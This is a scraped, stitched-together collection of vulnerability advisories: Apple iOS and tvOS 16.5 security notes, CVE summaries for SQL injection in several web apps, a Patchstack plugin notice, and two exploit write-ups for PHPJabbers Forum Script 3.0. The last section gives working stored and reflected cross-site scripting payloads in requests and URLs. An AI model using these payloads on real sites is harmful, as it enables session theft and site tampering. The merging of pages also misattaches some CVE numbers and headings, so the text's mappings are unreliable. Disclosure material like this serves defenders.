Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32385: About the security content of iOS 16.5 and iPadOS 16.5

A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app may be able to execute arbitrary code with kernel privileges

Released May 18, 2023

**AppleMobileFileIntegrity**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Core Location**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**GeoServices**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurfaceAccelerator**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32354: Linus Henze of Pinauten GmbH (pinauten.de)

**IOSurfaceAccelerator**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**Metal**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**Sandbox**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Siri**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: Adam M.

**Weather**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

**Wi-Fi**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-27930: About the security content of tvOS 16.5

A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file detailview.php. The manipulation of the argument employeeid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232288.

CVE-2023-3391

An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.

CVE-2023-36284

Unauth. SQL Injection (SQLi) vulnerability in InspireUI MStore API plugin <= 3.9.7 versions.

**Solution**

Fixed 

Update the WordPress MStore API plugin to the latest available version (at least 3.9.8).

Lucio Sá discovered and reported this SQL Injection vulnerability in WordPress MStore API Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information. This vulnerability has been fixed in version 3.9.8.

**Other vulnerabilities in this plugin**

 0 present

 12 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-47614: WordPress MStore API plugin <= 3.9.7 - SQL Injection - Patchstack

PHPJabbers Forum Script version 3.0 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.phpjabbers.com/php-forum-script/                               ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Forum Script 3.0                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /1687474733_118/preview.php?controller=pjLoad&action=pjActionAsk HTTP/1.1ask_question=1&name=[XSS Payload]&email=cracker@infosec.com&question=[XSS Payload]&description=[XSS Payload]&category_id=3-----------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'question' is vulnerable to XSSPOST parameter 'description' is vulnerable to XSS## Steps to Reproduce:1. Click on [+ New Question](as Guest)2. Inject your [XSS Payload] in "Full name"3. Inject your [XSS Payload] in "Question"4. Inject your [XSS Payload] in "Description"5. Select any [Category]6. Save (=Submit)5. When ADMIN Visit the [Questions] to Check [New Questions] on this Path (https://website/index.php?controller=pjAdminQuestions&action=pjActionIndex) in administration Panel6. XSS will Fire & Executed on his Browser7. Anyone visit your [Question Post] XSS will Fire & Executed on his Browser[-] Done

PHPJabbers Forum Script 3.0 Persistent Cross Site Scripting

PHPJabbers Forum Script version 3.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.phpjabbers.com/php-forum-script/                               │  
│  Vendor   : PHPJabbers                                                                 │  
│  Software : PHPJabbers Forum Script 3.0                                                │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /preview.php

URL parameter is vulnerable to RXSS

https://website/preview.php/xmbfr"><script>alert(1)</script>bqptl?controller=pjLoad&action=pjActionIndex&category_id=1

Path: /preview.php

GET parameter 'action' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndexje35u%3cimg%20src%3da%20onerror%3dalert(1)%3eo5ycr&category_id=1

Path: /preview.php

GET parameter 'column' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created%00undzx%3cscript%3ealert(1)%3c%2fscript%3eqqfc9&direction=DESC&keyword=

Path: /preview.php

GET parameter 'direction' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESCm1al6%22%3e%3cscript%3ealert(1)%3c%2fscript%3evwg49&keyword=

Path: /preview.php

GET parameter 'keyword' is vulnerable to RXSS

https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=v467i%22%3e%3cscript%3ealert(1)%3c%2fscript%3ek9pxe

[-] Done

Tag

#sql